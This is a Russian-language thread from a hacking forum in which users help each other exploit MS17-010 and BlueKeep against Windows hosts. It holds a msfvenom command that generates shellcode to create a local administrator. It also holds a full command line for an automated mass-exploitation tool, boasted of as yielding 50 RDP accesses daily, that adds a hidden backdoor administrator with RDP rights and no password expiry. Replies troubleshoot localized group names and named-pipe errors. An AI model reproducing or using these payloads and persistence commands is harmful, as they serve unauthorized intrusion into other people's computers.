• XSS.stack #1 – первый литературный журнал от юзеров форума

PrivEsc ms17-010/bluekeep

Отслеживать

CCod

(L3) cache
Пользователь
Регистрация
08.01.2022
Сообщения
280
Реакции
60
Эксплуатирую мс17-010 и блюкип использую пэйлоад из метасплойта с добавлением юзера .Шелкод генерирую так msfvenom -p windows/x64/exec cmd="cmd.exe /c net user admin password /add && net localgroup administrators admin /add" .Эксплойт срабатывает юзер создается,но не добавляется в группу админов.Как решить эту проблему?
 
Сортировать по дате Сортировать по голосам
Бывает так что группа называется по другому, если система на другом языке.
На испанском это будет Administradores. Посмотри названия группы через cmd.
 
За 0 Против
так это, у тебя там ошибка. && это ж в ПШ, для смд нужно &
 
За 0 Против
Prozac сказал(а):
так это, у тебя там ошибка. && это ж в ПШ, для смд нужно &
  • & separates commands on a line.
  • && executes this command only if previous command's errorlevel is 0.

Разницы в данном случае нет, наоборот лучше && чтобы меньше срача в Event Log если первая не сработает.
 
За 0 Против
Пожалуйста, обратите внимание, что пользователь заблокирован
I have this tool Automatization Blackkeep
It still get BIG results 50 RDP's every day. But 99% Are WORKGROUP Single PC's so the Exploit is Useless

bks -t 20 -ipl split11.txt -p32 cmd_payload_x86.exe -p64 cmd_payload_x64.exe -cmd "cmd.exe /c net user user pass /add & net localgroup Administrators user /add & net localgroup \"Remote Desktop Users \" user /add & net accounts /maxpwage:unlimited & reg add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /t REG_DWORD /f /d 0 /v user"
pause

For example if you use it on FRANCE . You need to change localgroup Administrators to localgroup Administrateurs
 
За 0 Против
fijos77 сказал(а):
I have this tool Automatization Blackkeep
It still get BIG results 50 RDP's every day. But 99% Are WORKGROUP Single PC's so the Exploit is Useless

bks -t 20 -ipl split11.txt -p32 cmd_payload_x86.exe -p64 cmd_payload_x64.exe -cmd "cmd.exe /c net user user pass /add & net localgroup Administrators user /add & net localgroup \"Remote Desktop Users \" user /add & net accounts /maxpwage:unlimited & reg add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\" /t REG_DWORD /f /d 0 /v user"
pause

For example if you use it on FRANCE . You need to change localgroup Administrators to localgroup Administrateurs
can u share this tool?
 
За 0 Против
есть уязвимые хосты к мс17, но вылезает ошибка Unable to find accessible named pipe! что делать в таком случае? на гите прочитал что креды надо дописать, дописал не помогло, буду благодарен
 
За 0 Против
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх